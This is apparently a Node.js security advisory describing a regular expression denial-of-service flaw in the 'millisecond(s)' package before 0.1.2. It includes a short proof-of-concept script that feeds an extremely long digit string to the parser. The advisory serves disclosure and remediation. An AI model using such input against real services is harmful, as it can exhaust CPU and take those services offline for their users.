Regular Expression Denial of Service

2015-11-20T18:52:47
ID NODEJS:59
Type nodejs
Reporter Luigi Pinca
Modified 2018-05-08T14:27:02

Description

Overview

Versions of milliseconds prior to 0.1.2 are affected by a regular expression denial of service vulnerability when extremely long version strings are parsed.

Proof of concept

``` var ms = require('millisecond'); var genstr = function (len, chr) { var result = ""; for (i=0; i<=len; i++) { result = result + chr; }

return result; }

ms(genstr(process.argv[2], "5") + " minutea"); ```

Recommendation

Update to version 0.1.2 or later.

References

PR #4